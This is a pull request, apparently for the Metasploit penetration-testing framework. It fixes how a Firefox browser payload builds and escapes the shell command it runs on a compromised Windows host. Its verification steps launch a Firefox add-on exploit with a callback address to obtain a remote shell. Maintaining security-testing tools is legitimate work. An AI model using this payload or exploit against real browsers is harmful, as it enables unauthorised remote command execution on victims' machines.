### PR TITLE
Fix windows cmd redirection in firefox payloads.

### DIFF
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -169,12 +169,13 @@ module Msf::Payload::Firefox
           .get("TmpD", Components.interfaces.nsIFile);
         stdout.append(stdoutFile);
 
+        var shell;
         if (windows) {
-          var shell = shPath+" "+cmd;
+          shell = shPath+" "+cmd.trim();
           shell = shPath+" "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>&1";
           var b64 = svcs.btoa(shell);
         } else {
-          var shell = shPath+" "+cmd.replace(/\\W/g, shEsc);
+          shell = shPath+" "+cmd.replace(/\\W/g, shEsc);
           shell = shPath+" "+shell.replace(/\\W/g, shEsc) + " >"+stdout.path+" 2>&1";
         }
         var process = Components.classes["@mozilla.org/process/util;1"]


### PR DESCRIPTION
Command output from firefox shells running on windows was broken because a newline ended up in the wrong spot. This fixes the shells.
#### Verification
- [x] On any windows, get a shell with a firefox payload:
  
  ```
  msf> use exploits/multi/browser/firefox_xpi_bootstrapped_addon
  msf> set LHOST my.ip.addr
  msf> run
  ```
- [x] Ensure you can run `ping` and `echo abc` in the shell as expected
